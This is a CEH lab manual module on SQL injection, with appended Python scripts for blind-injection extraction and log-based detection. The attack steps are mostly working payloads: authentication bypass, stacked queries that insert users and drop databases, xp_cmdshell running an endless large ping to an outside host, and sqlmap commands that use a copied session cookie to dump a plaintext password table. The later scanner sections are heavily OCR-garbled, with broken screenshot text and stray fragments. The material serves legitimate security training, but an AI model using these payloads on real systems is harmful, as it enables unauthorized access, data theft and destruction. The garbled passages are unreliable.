CEH Lab Manual
Module 15: SQL Injection
CEH Lab Manual Page 1024

Tools demonstrated in this lab are available in E:\CEH-Tools\CEHv11 Module 15 SQL Injection

SQL Injection

SQL injection is a technique that takes advantage of input vulnerabilities to pass malicious SQL commands through a web application for execution by a backend database.

Lab Scenario

SQL injection is the most common and devastating attack that attackers can use to take control of data-driven web applications and websites. It is a code injection technique that exploits a security vulnerability in a website or application's software. SQL injection attacks use a series of malicious SQL (Structured Query Language) queries or statements to directly manipulate any type of SQL database. Applications often use SQL statements to authenticate users, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. SQL injection attacks work when applications do not properly validate input before passing it to a SQL statement.

When attackers use tactics like SQL injection to compromise web applications and sites, the targeted organizations can incur huge losses in terms of money, reputation, and loss of data and functionality. As an ethical hacker or penetration tester (hereafter, pen tester), you must possess sound knowledge of SQL injection techniques and be able to protect against them in diverse ways, such as using prepared statements with bind parameters, whitelist input validation, and escaping of user-supplied input. Input validation can be used to detect unauthorized input before it is passed to the SQL query. Of these defenses, prepared statements with bind parameters are the primary one: they keep user input out of the SQL grammar entirely, whereas escaping is easy to get wrong and should only complement them.

The labs in this module give hands-on experience in testing a web application against various SQL injection attacks.

Lab Objectives

The objective of this lab is to perform SQL injection attacks and other tasks that include, but are not limited to:

* Understanding when and how web applications connect to a database server in order to access data
* Performing a SQL injection attack on an MSSQL database
* Exploiting basic SQL injection flaws and vulnerabilities
* Detecting SQL injection vulnerabilities

Lab Environment

To carry out this lab, you need:

* Windows Server 2019 virtual machine
* Windows Server 2016 virtual machine
* Windows 10 virtual machine
* Parrot Security virtual machine
* Web browsers with an Internet connection
* Administrator privileges to run the tools

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Lab Duration

Time: 60 Minutes

Overview of SQL Injection

SQL injection attacks can be performed using various techniques to view, manipulate, insert, and delete data from an application's database. There are three main types of SQL injection:

* In-band SQL injection: An attacker uses the same communication channel to perform the attack and retrieve the results
* Blind/inferential SQL injection: An attacker has no error messages from the system with which to work, but rather simply sends a malicious SQL query to the database and infers the result from the application's behavior (a changed page or a delay)
* Out-of-band SQL injection: An attacker uses different communication channels (such as database email functionality, or file writing and loading functions) to perform the attack and obtain the results

Lab Tasks

Ethical hackers or pen testers use numerous tools and techniques to perform SQL injection attacks on target web applications. The recommended labs that will assist you in learning various SQL injection techniques include:

1. Perform SQL Injection Attacks
   1.1 Perform an SQL Injection Attack on an MSSQL Database
   1.2 Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap
2. Detect SQL Injection Vulnerabilities using Various SQL Injection Detection Tools
   2.1 Detect SQL Injection Vulnerabilities using DSSS
   2.2 Detect SQL Injection Vulnerabilities using OWASP ZAP

Remark

EC-Council has prepared a considerable amount of lab exercises for students to practice during the 5-day class and in their free time to enhance their knowledge and skills.

* Core - Lab exercise(s) marked under Core are recommended by EC-Council to be practiced during the 5-day class.
* Self Study - Lab exercise(s) marked under Self Study are for students to practice in their free time. Steps to access the additional lab exercises can be found in the first page of the CEHv11 volume 1 book.
* iLabs - Lab exercise(s) marked under iLabs are available in our iLabs solution. iLabs is a cloud-based virtual lab environment preconfigured with vulnerabilities, exploits, tools, and scripts, and can be accessed from anywhere with an Internet connection. If you are interested to learn more about our iLabs solution, please contact your training center or visit https://ilabs.eccouncil.org.

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion on your target's security posture.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Lab 1: Perform SQL Injection Attacks

In SQL injection attacks, a series of malicious SQL queries or statements are used to manipulate the database of a web application or site.

Lab Scenario

SQL injection is an alarming issue for all database-driven websites.
An attack can be attempted on any normal website or software package based on how it is used and how it processes user-supplied data. SQL injection attacks are performed on SQL databases with weak code that does not adequately filter, strongly type, or correctly handle user input. This vulnerability can be used by attackers to execute database queries to collect sensitive information, modify database entries, or attach malicious code, resulting in total compromise of the most sensitive data.

As an ethical hacker or pen tester, in order to assess the systems in your target network, you should test relevant web applications for various vulnerabilities and flaws, and then exploit those vulnerabilities to perform SQL injection attacks.

Lab Objectives

* Perform an SQL injection attack on an MSSQL database
* Perform an SQL injection attack against MSSQL to extract databases using sqlmap

Lab Environment

To carry out this lab, you need:

* Windows Server 2019 virtual machine
* Windows 10 virtual machine
* Parrot Security virtual machine
* Web browsers with an Internet connection
* Administrator privileges to run the tools

Lab Duration

Time: 40 Minutes

Overview of SQL Injection

SQL injection can be used to implement the following attacks:

* Authentication bypass: An attacker logs onto an application without providing a valid username and password and gains admin privileges
* Authorization bypass: An attacker alters authorization information stored in the database by exploiting SQL injection vulnerabilities
* Information disclosure: An attacker obtains sensitive information that is stored in the database
* Compromised data integrity: An attacker defaces a webpage, inserts malicious content into webpages, or alters the contents of a database
* Compromised availability of data: An attacker deletes specific information, the log, or audit information in a database
* Remote code execution: An attacker executes a piece of code remotely that can compromise the host OS

Lab Tasks

Task 1: Perform an SQL Injection Attack on an MSSQL Database

Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications, which may run either on the same computer or on another computer across a network (including the Internet).

Here, we will use SQL injection queries to perform SQL injection attacks on an MSSQL database.

Note: In this lab, the machine hosting the website (the Windows Server 2019 virtual machine) is the victim machine, and the Windows 10 virtual machine will perform the attack.

1. Turn on the Windows 10 and Windows Server 2019 virtual machines.
2. In the Windows 10 virtual machine, log in with the credentials Admin and Pa$$w0rd.
3. Open any web browser (in this case, we are using Mozilla Firefox), type http://www.goodshopping.com in the address bar, and press Enter.
4. The GOOD SHOPPING home page loads. Assume that you are new to this site and have never registered with it; click LOGIN on the menu bar.
   Figure 1.1.1: GOOD SHOPPING home page
5. In the Username field, type the query blah' or 1=1 -- as your login name, and leave the Password field empty. Click the Log in button.
   Note: The single quote closes the string literal the application built around your input, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the statement, including the password check. The query therefore returns the first user in the table and the application treats that as a successful login.
   Figure 1.1.2: Login without valid credentials
An SQL injection query exploits the normal execution of SQL statements. It involves submitting requests with values that will execute normally but return data from the database that you want. You can "inject" these malicious values into the queries because of the application's inability to filter them before processing. If values submitted by users are not properly validated by an application, it is a potential target for an SQL injection attack.

6. You are now logged into the website with a fake login, even though your credentials are not valid. Now, you can browse all the site's pages as a registered member. After browsing the site, click Logout from the top-right corner of the webpage.
   Figure 1.1.3: Logged in without valid credentials

Note: Blind SQL injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. It is identical to a normal SQL injection except that when an attacker attempts to exploit an application, rather than seeing a useful (i.e., information-rich) error message, a generic custom page is displayed. In blind SQL injection, an attacker poses a true or false question to the database to see if the application is vulnerable to SQL injection.

7. Now, we shall create a user account using an SQL injection query. Before proceeding with this sub-task, we shall first examine the login database of the GoodShopping website.
8. Switch to the Windows Server 2019 virtual machine and log in with the credentials Administrator and Pa$$w0rd.
   Note: In this task, we are logging into the Windows Server 2019 virtual machine as the victim.
9. Click the Type here to search icon in the lower section of Desktop and type microsoft. From the results, click Microsoft SQL Server Management Studio 18.
   Figure 1.1.4: Opening Microsoft SQL Server Management Studio
10. Microsoft SQL Server Management Studio opens, along with a Connect to Server pop-up. In the Connect to Server pop-up, leave the default settings as they are and click the Connect button.
    Figure 1.1.5: Connect to Server pop-up
11. In the left pane of the Microsoft SQL Server Management Studio window, under the Object Explorer section, expand the Databases node. From the available options, expand the GoodShopping node, and then the Tables node under it.
12. Under the Tables node, right-click the dbo.Login table and click Select Top 1000 Rows from the context menu to view the available credentials.
    Figure 1.1.6: Opening the Login table
13. You can observe that the database contains only one entry, with the username and password smith and smith123, respectively.
    Figure 1.1.7: SQL database contents
14. Switch back to the Windows 10 virtual machine and go to the browser where the GoodShopping website is open.
15. Click LOGIN on the menu bar and type the query blah';insert into login values ('john','apple123'); -- in the Username field (as your login name) and leave the Password field empty. Click the Log in button.
    Note: The ; ends the application's SELECT statement, and the INSERT after it runs as a second statement in the same batch (a stacked query). This works because SQL Server executes the whole batch the application sends, and because the login the application connects with has INSERT rights on the table.
    Figure 1.1.8: Creating a user account
16. If no error message is displayed, the injected INSERT has most likely executed. The absence of an error is not proof by itself, so the following steps verify it.
17. After executing the query, to verify whether your login has been created successfully, click the LOGIN tab, enter john in the Username field and apple123 in the Password field, and click Log in.
    Figure 1.1.9: Logging in with the created account
18. You will log in successfully with the created login and be able to access all the features of the website.
19. After browsing the required pages, click Logout from the top-right corner of the webpage.
    Figure 1.1.10: Logged in as the created user
20. Switch back to the victim machine (Windows Server 2019 virtual machine).
21. In the Microsoft SQL Server Management Studio window, right-click dbo.Login and click Select Top 1000 Rows from the context menu.
22. You will observe that a new user entry has been added to the website's login table with the username and password john and apple123, respectively.
    Figure 1.1.11: Table containing the created username and password
23. Switch back to the Windows 10 virtual machine and the browser where the GoodShopping website is open.
24. Click LOGIN on the menu bar and type the query blah';create database mydatabase; -- in the Username field (as your login name) and leave the Password field empty. Click the Log in button.
25. In the above query, mydatabase is the name of the database.
    Figure 1.1.12: Creating a database
26. If no error message (or any message) displays on the webpage, it means that the site is vulnerable to SQL injection and a database with the name mydatabase has been created on the database server. CREATE DATABASE needs server-level permission, so this succeeds only because the web application connects to SQL Server with a highly privileged login; that over-privileged connection is itself a finding worth reporting.
27. Switch back to the Windows Server 2019 virtual machine.
28. In the Microsoft SQL Server Management Studio window, collapse the Databases node and click the Refresh icon.
29. Expand the Databases node. A new database has been created with the name mydatabase, as shown in the screenshot.
    Figure 1.1.13: Database created successfully
30. Switch back to the Windows 10 virtual machine and the browser where the GoodShopping website is open.
31. Click LOGIN on the menu bar and type the query blah';drop database mydatabase; -- in the Username field; leave the Password field empty and click Log in.
    Note: In the above query, you are deleting the database that you created in Step 24 (mydatabase). In the same way, you could also delete a table from the victim website's database by typing blah';DROP TABLE table_name; -- in the Username field.
    Figure 1.1.14: Deleting a database
32. To see whether the query has successfully executed, switch back to the victim machine (Windows Server 2019) and, in the Microsoft SQL Server Management Studio window, click the Refresh icon.
33. Expand the Databases node in the left pane; you will observe that the database called mydatabase has been deleted from the list of available databases, as shown in the screenshot.
    Figure 1.1.15: Database deleted successfully
    Note: In this case, we are deleting the same database that we created previously. However, in real-life attacks, if an attacker can determine the available database name and tables in the victim website, they can delete the database or tables by executing SQL injection queries.
34. Close the Microsoft SQL Server Management Studio window.

Perform Ping Operation Using SQL Injection

35. Switch back to the Windows 10 virtual machine and the browser where the GoodShopping website is open.
36. Click LOGIN on the menu bar and type the query blah';exec master..xp_cmdshell 'ping www.certifiedhacker.com -l 65000 -t'; -- in the Username field; leave the Password field empty and click Log in.
    Note: In the above query, you are pinging the www.certifiedhacker.com website from the database server using an SQL injection query. -l 65000 is the send buffer size (each echo request carries 65,000 bytes of data) and -t makes ping keep running until it is stopped.
    Note: xp_cmdshell runs an operating-system command as the SQL Server service account. It is disabled by default, enabling it requires sysadmin-level rights, and non-sysadmin logins can only call it through a configured proxy account, so this step works only because the web application's database login is that highly privileged. Running the application under a least-privilege login and leaving xp_cmdshell disabled would stop this step even if the injection flaw remained.
    Figure 1.1.16: Ping via SQL injection
37. The SQL injection query starts pinging the host, and the login page shows a Waiting for www.goodshopping.com... message at the bottom of the window. The page hangs because xp_cmdshell does not return until the command exits, and ping -t never exits.
    Figure 1.1.17: SQL injection query starts pinging the host
38. To see whether the query has successfully executed, switch back to the victim machine (Windows Server 2019).
39. Right-click the Start icon in the bottom-left corner of Desktop and, from the options, click Task Manager. Click More details in the lower section of the Task Manager window.
40. Navigate to the Details tab. You can observe a process called PING.EXE running in the background.
41. This process is the result of the SQL injection query that you entered in the login field of the target website.
    Figure 1.1.18: Task Manager displaying the ping process
42. To manually kill this process, click PING.EXE, and click the End task button in the bottom right of the window.
43. If a Task Manager pop-up appears, click End process. This stops or prevents the website from pinging the host.
44. This concludes the demonstration of how to perform SQL injection attacks on an MSSQL database.
45. Close all open windows and document all the acquired information.
46. Turn off the Windows 10 virtual machine.
Task 2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

In this task, we will use sqlmap to perform an SQL injection attack against MSSQL to extract databases.

Note: In this lab, you will pretend that you are a registered user on the http://www.moviescope.com website, and you want to crack the passwords of the other users from the website's database.

Note: Ensure that the Windows Server 2019 virtual machine is running.

1. Turn on the Parrot Security virtual machine.
2. In the login page, the attacker username will be selected by default. Enter toor in the Password field and press Enter to log in to the machine.
   Figure 1.2.1: Parrot Security login screen
   Note: If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it.
   Note: If a Question pop-up window appears asking you to update the machine, click No to close the window.

Task 2.1: Log in to MovieScope

3. Click the Mozilla Firefox icon from the menu bar in the top-left corner of Desktop to launch the web browser.
4. Type http://www.moviescope.com/ and press Enter. A Login page loads; enter the Username and Password as sam and test, respectively. Click the Login button.
   Note: If a "Would you like Firefox to save this login for moviescope.com?" notification appears at the top of the browser window, click Don't Save.
   Figure 1.2.2: MovieScope login page
5. Once you are logged into the website, click the View Profile tab on the menu bar and, when the page has loaded, make a note of the URL in the address bar of the browser.
You can use sqlmap to perform SQL injection on a target website using various techniques, including Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band SQL injection.

6. Right-click anywhere on the webpage and click Inspect Element from the context menu, as shown in the screenshot.
   Figure 1.2.3: Inspect Element option
7. The Developer Tools frame appears in the lower section of the browser window. Click the Console tab, type document.cookie in the lower-left corner of the browser, and press Enter.
   Figure 1.2.4: Requesting the cookie

Task 2.2: Obtain Session Cookie

8. Select the cookie value, then right-click and copy it, as shown in the screenshot. Minimize the web browser.
   Note: The cookie value may differ in your lab environment.
   Figure 1.2.5: Copying the cookie value
9. Click the MATE Terminal icon at the top of the Desktop window to open a Parrot Terminal window.
10. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as the root user.
11. In the [sudo] password for attacker field, type toor as the password and press Enter.
    Note: The password that you type will not be visible.
12. Now, type cd and press Enter to jump to the root user's home directory.

Task 2.3: Retrieve Databases

13. In the Parrot Terminal window, type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value>" --dbs and press Enter.
    Note: In this command, -u specifies the target URL (the one you noted down in Step 5), --cookie specifies the HTTP cookie header value (the one you copied in Step 8), and --dbs enumerates DBMS databases. The cookie matters because viewprofile.aspx is only reachable by a logged-in user; without it, sqlmap would be testing the login redirect instead of the vulnerable page.
14. The above command causes sqlmap to try various injection techniques on the id parameter of the URL in an attempt to extract the database information of the MovieScope website.
    Figure 1.2.6: Running sqlmap to enumerate databases
15. If the message Do you want to skip test payloads specific for other DBMSes? [Y/n] appears, type Y and press Enter.
16. If the message for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] appears, type Y and press Enter.
17. Similarly, if any other message appears, type Y and press Enter to continue.
18. sqlmap retrieves the databases present in the MSSQL server. It also displays information about the web server OS, web application technology, and the backend DBMS, as shown in the screenshot.
    Figure 1.2.7: Databases retrieved by sqlmap
19. Now, you need to choose a database and use sqlmap to retrieve the tables in the database. In this lab, we are going to determine the tables associated with the database moviescope.
20. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value>" -D moviescope --tables and press Enter.
    Note: In this command, -D specifies the DBMS database to enumerate and --tables enumerates the tables in that database.
21. The above command causes sqlmap to scan the moviescope database for the tables it contains.
    Figure 1.2.10: Command to list the tables in the moviescope database
22. sqlmap retrieves the tables of the moviescope database and displays them, as shown in the screenshot.
    Figure 1.2.11: Tables retrieved from the moviescope database
23. Now, type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value>" -D moviescope -T User_Login --dump and press Enter to dump all the User_Login table content.
    Note: -T specifies the table to target and --dump retrieves its rows.
    Figure 1.2.12: Dumping the User_Login table
24. sqlmap retrieves the complete User_Login table data from the database moviescope, containing all users' usernames under the Uname column and passwords under the password column, as shown in the screenshot.
25. You will see that under the password column, the passwords are shown in plain text. Storing passwords unhashed is a second finding here: it turns a read-only injection into an immediate account takeover.
26. To verify if the login details are valid, you should try to log in with the extracted login details of any of the users. To do so, switch back to the web browser, close the Developer Tools console, and click Logout to start a new session on the site.

Task 2.4: Log in to MovieScope using retrieved credentials

27. The Login page appears; log in to the website using the retrieved credentials john/qwerty.
    Note: If a "Would you like Firefox to save this login for moviescope.com?" notification appears at the top of the browser window, click Don't Save.
28. You will observe that you have successfully logged into the MovieScope website with john's account, as shown in the screenshot.
    Figure 1.2.13: Logged in with the retrieved credentials
29. Now, switch back to the Parrot Terminal window.
"http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=""
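sqlmap recovered the User_Login table through the id parameter of viewprofile.aspx, and the note earlier in this lab explains that blind injection works by asking the database true/false questions and reading the answer from the application's behaviour. The Python script below is an added example, not code from the lab manual, from sqlmap or from DSSS. It emulates a viewprofile page that only reveals whether a profile exists, checks for boolean-based blind injection the way automated scanners start out (appending AND 1=1 and AND 1=2 and comparing the responses), and then extracts a password one character at a time with a binary search on the character code. The table name, columns and rows are constructed from the lab text; unicode() and substr() are SQLite's equivalents of the ASCII() and SUBSTRING() functions an attacker would use against MSSQL, and safe_viewprofile() shows the parameterised page that the same check reports as not injectable.

```python
import sqlite3

FOUND = "Profile found"
NOT_FOUND = "Profile not found"


def make_db():
    """Constructed stand-in for the MovieScope User_Login table (assumption:
    an id, a Uname and a password column, as the sqlmap dump in Task 2 shows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE User_Login (id INTEGER, Uname TEXT, password TEXT)")
    conn.executemany("INSERT INTO User_Login VALUES (?, ?, ?)",
                     [(1, "sam", "test"), (2, "john", "qwerty")])
    conn.commit()
    return conn


def viewprofile(conn, id_param):
    """Emulates viewprofile.aspx?id=<value>: the id value is concatenated into
    the statement (the defect), and the page reveals only whether a profile
    was found. Errors are hidden behind the same generic page, so the
    attacker gets a single true/false bit per request: blind SQL injection."""
    query = f"SELECT Uname FROM User_Login WHERE id={id_param}"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return NOT_FOUND
    return FOUND if rows else NOT_FOUND


def safe_viewprofile(conn, id_param):
    """Parameterised page: the id value is bound as data, so an appended
    condition is compared against the column as text and matches nothing."""
    rows = conn.execute("SELECT Uname FROM User_Login WHERE id=?",
                        (id_param,)).fetchall()
    return FOUND if rows else NOT_FOUND


def is_boolean_blind_injectable(page, base):
    """The first check a scanner makes: a condition that is always true must
    leave the page unchanged, and one that is always false must change it."""
    true_page = page(f"{base} AND 1=1")
    false_page = page(f"{base} AND 1=2")
    return page(base) == true_page and true_page != false_page


def extract_string(page, base, subquery, max_len=32):
    """Recovers the result of `subquery` one character at a time, asking only
    yes/no questions: a binary search over the character code costs about
    seven requests per character. unicode()/substr() are the SQLite forms of
    MSSQL's ASCII()/SUBSTRING(). An empty substr() gives NULL, so every probe
    past the end of the string is false and the search stops at 0."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{base} AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if page(probe) == FOUND:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    page = lambda value: viewprofile(db, value)
    print(is_boolean_blind_injectable(page, "1"))                          # True
    print(is_boolean_blind_injectable(lambda v: safe_viewprofile(db, v), "1"))  # False
    print(extract_string(page, "1",
                         "SELECT password FROM User_Login WHERE Uname='john'"))  # qwerty
```

Each recovered character costs about log2(128) requests, which is the time cost the lab's note on blind injection refers to; sqlmap trims it with character-frequency heuristics and multi-threading, but the bit-per-request limit remains. Against a page that also leaks timing, the same oracle can be built from a delay (WAITFOR DELAY on MSSQL) instead of a content difference.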
Lab 2, Task 1: Detect SQL Injection Vulnerabilities using DSSS

Scan the Website for SQL Injection Vulnerabilities

18. Switch to a terminal window and type python3 dsss.py -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value>" and press Enter.
    Note: In this command, -u specifies the target URL and --cookie specifies the HTTP cookie header value.
    Figure 2.1.10: Using the command to check for SQL injection vulnerabilities
19. The above command causes DSSS to scan the target website for SQL injection vulnerabilities.
20. The result appears, showing that the target website (www.moviescope.com) is vulnerable to blind SQL injection attacks. The vulnerable link is also displayed, as shown in the screenshot.
    Figure 2.1.11: Result of the command, showing vulnerability to blind SQL injection

View the Vulnerable Website Link

21. Highlight the vulnerable website link, right-click it, and, from the options, click Copy.
    Figure 2.1.12: Copying the vulnerable link
22. Switch to Mozilla Firefox; in a new tab, paste the copied link in the address bar and press Enter.
23. You will observe that information regarding available user accounts appears under the View Profile tab.
    Figure 2.1.13: Visiting the vulnerable link
24. Scroll down to view the user account information for all users.
    Figure 2.1.14: User account information for all MovieScope users
    Note: In real life, attackers use blind SQL injection to access or destroy sensitive data. Attackers can steal data by asking a series of true or false questions through SQL statements. The results of the injection are not visible to the attacker. This type of attack can become time-intensive, because the database must evaluate a new statement for each newly recovered bit.
25. This concludes the demonstration of how to detect SQL injection vulnerabilities using DSSS.
26. Close all open windows and document all the acquired information.
27. Turn off the Parrot Security virtual machine.

Lab 2, Task 2: Detect SQL Injection Vulnerabilities using OWASP ZAP

OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. It is designed to be used by people with a wide range of security experience, and as such is ideal for developers and functional testers who are new to penetration testing.

In this task, we will use OWASP ZAP to test a web application for SQL injection vulnerabilities.

Note: We will scan the www.moviescope.com website that is hosted on the Windows Server 2019 virtual machine.

Task 2.1: Launch and Configure OWASP ZAP

1. Turn on the Windows Server 2019 virtual machine and log in with the credentials Administrator and Pa$$w0rd.
   Note: We have already installed OWASP ZAP on the Windows Server 2019 virtual machine during the Module 11 Session Hijacking labs. If the tool is already installed, skip to Step 2. Otherwise, follow these steps to install it:
   * Turn on the Windows 10 virtual machine.
   * Navigate to Z:\CEHv11 Module 11 Session Hijacking\OWASP ZAP, double-click ZAP_2_8_0_windows.exe, and follow the installation steps to install it.
   * When the Setup - OWASP Zed Attack Proxy window appears, click Next.
= In the Select Installation Type wizard, ensure that the Standard installation radio button is selected and click Next. = Follow the installation steps to install OWASP ZAP using the default settings. = After the installation completes, the Completing the OWASP Zed Attack Proxy Setup Wizard appears; click Finish. 2. Double-click the OWASP ZAP shortcut on Desktop to launch the application, ‘Note: Ifan OWASP ZAP pop-up window appears, click OK. 3. A prompt that reads Be you want to persist the ZAP Session? appears; sclect the No, 1 do not want to persist this session at this moment in time radio button, and click Start. Note: Ifa Manage Add-ons window appears, close it W owase ZAP Do you want to persist the ZAP Session? CO Yes, lwantto persist his session with name based on he current timestamp | Yes, | wantto persist this session but | wantto speaily the name and location ge 22:1 WAS ZAP Pst Se ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited. Module 45 - SQL Injection 4. ‘The OWASP ZAP main window appears; under the Quiek Start tab, click the Automated Sean option. Welcome to OWASP ZAP Etat Cenet Dee an eye nop eeesonecing tt nage meh eam Soca 8 @ = Fipue 222-0WASD ZAP ck Mam Exploe 5, The Automated Sean wizard appears, enter the target website in the URL to attack ficld (in this casc, http:!www.moviescope.com). Leave other options set to default, and then click the Attaek button. ‘Eocertcmen is) Automated Scan Rg @ ome ‘snes aaa an trates pi! npn neat — [emo Eee Useraanontepee useasannc Qn Gavrtaaanes 9) exes ge 223, OWASP ZAP: Auten wiza (CoH Lab Manual Page L465 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited. Module 45 - SQL Injection 6. OWASP ZAP stacts performing Metive Sean on the target website, as shown in the screenshot. 
Yew rae Rept Inds ont in © phot sen saeco yan eect ueivse — [Remmwnonmeam ——f]@ama) Ueeaacsnier Lh (Fedcteateas |p) [vison [seer [FR were [ove | 0 nic] [+] Drew Poyess [crmnwsnevscpecom is) UL Rt Curescns Manreqests Ted News € Rea Timesheet et URL Fjpae 22.4 OWASP ZAP Sons de uae wee 7. Afier the scan completes, Alerts tab appears, as shown in the screenshot. 8. You can observe the vulnerabilities found on the website under the Alerts tab. ‘Note: The discovered vulnerabilities might differ in your lab environment. (CoH Lab Manual Page 1466 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited. Automated Scan ‘Boeauncenee @ ste Teese elanenn aeat scn ayen gine225 OWASP ZAP. Abst 9, Now, expand the $@L Injection vulnerability node under the Alerts tab. sn an ata cy scene so en ee Floral otan swae seta eS e ‘Tage aanetaetate oecemnneracninn ame eons ede et (3) ie Bowes Powe tence ©) > Peco inners Heder ing 15) Fe 226g SQ Inston ny (CoH Lab Manual Page 1467 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited. (usps: /soneton), Burp Suite haps porsuiguer a), ‘Saf (ip //wSaon), ral Netsparker Web, Application Secusiy ‘Scanner (heaps //wrwnctspaker com) todas QU fection valnetak (CoH Lab Manual Page L468 Module 45 - SQL Injection 10. Click on the discovered SQL Injection vulnerability and further click on the vulnerable URL. 11, You can observe the information such as Risk, Confidence, Parameter, Attack, cic. regarding the discovered SQL Injection vulnerability in the lower sight-bottom, as shown in the screenshot Note: The sisks associated with the vulnerability are categorized acconding to severity of risk as Lew, Medium, High, and Informational alerts. 
Hach level of tisk is represented by a different flag color Red (BY): High risk © Orange (FM): Medium risk © Yellow (BY) Low risk + Blue (BY): Provides details about information disclosuce vulnerabilities en aus uinecn an aso spe Seton. tee uss [iplimanainarcen ip wae Paso ena Tews rc Peeters) ign 227 Infrmaton ginger ui 12. This concludes the demonstration of how to detect SQL. injection ‘vulnerabilities using OWASP ZAP. 15. Close all open windows and document all the acquired information. 14, ‘Turn off the Windows Server 2049 virwal machine. ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited. Module 45-01 Injection Lab Analysis Analyze and document the results related to this lab exercise. Give your opinion on the target’s security posture and exposure. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB pete ONo Platform Supported © Classroom GiLabs (CEH Lab Manual Page 1469 ‘Ethical Hacking and Countermensures Copyright © by EC-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.
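Both DSSS and OWASP ZAP find the flaw the same way the note above describes: they send many requests to the same parameter with boolean and time-based payloads and compare the responses. The defender's counterpart is to recognise that traffic in the web server logs. The script below is an added example written for this lab; it is not code from the CEH manual, DSSS, or OWASP ZAP. It parses constructed access log lines in Common Log Format (the log lines, IP addresses, timestamps and response sizes are all made up for the example), decodes the query string, matches each parameter value against coarse SQL injection indicators, and raises an alert when one source sends several flagged requests to one endpoint. It also records the distinct response sizes of the flagged requests, because differing sizes for the true and false probe pair are exactly the signal a blind injection relies on.

```python
"""Flag likely SQL injection probe traffic in web server access logs.

Added example for this lab (not code from the CEH manual, DSSS or OWASP ZAP).
The log format and the log lines below are constructed; the URL-decoded
query parameters are matched against coarse SQL injection indicators
such as the boolean "AND 1=1 / AND 1=2" pairs that blind scanners send.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

# Coarse, case-insensitive indicators. They are for triage: a hit means
# "look at this request", not "this request succeeded".
SQLI_PATTERNS = [
    re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),   # boolean probe: AND 1=1 / AND 1=2
    re.compile(r"'\s*(and|or)\b", re.I),                  # quote breakout followed by AND/OR
    re.compile(r"\bunion\b.*\bselect\b", re.I),           # UNION SELECT
    re.compile(r"\b(sleep|waitfor|benchmark)\b", re.I),   # time-based probe
    re.compile(r"(--|/\*)"),                              # SQL comment sequences
]

# Common Log Format (assumed for this example): ip ident user [ts] "req" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["endpoint"] = parts.path
    # parse_qsl percent-decodes values, so "1%20AND%201=1" becomes "1 AND 1=1"
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def suspicious_params(params):
    """Return the (name, value) pairs whose value matches any indicator."""
    return [(n, v) for n, v in params if any(p.search(v) for p in SQLI_PATTERNS)]


def analyze(lines, threshold=3):
    """Group flagged requests by (source ip, endpoint).

    Returns (counts, alerts): counts maps each key to the number of flagged
    requests; alerts holds the keys at or above threshold with the observed
    payloads and the set of distinct response sizes (different sizes for the
    true/false probe pair are the oracle a blind injection relies on).
    """
    counts = Counter()
    payloads = defaultdict(list)
    sizes = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["params"])
        if not hits:
            continue
        key = (rec["ip"], rec["endpoint"])
        counts[key] += 1
        payloads[key].append(hits[0][1])
        sizes[key].add(rec["size"])
    alerts = {
        key: {"requests": n, "payloads": payloads[key], "sizes": sizes[key]}
        for key, n in counts.items() if n >= threshold
    }
    return counts, alerts


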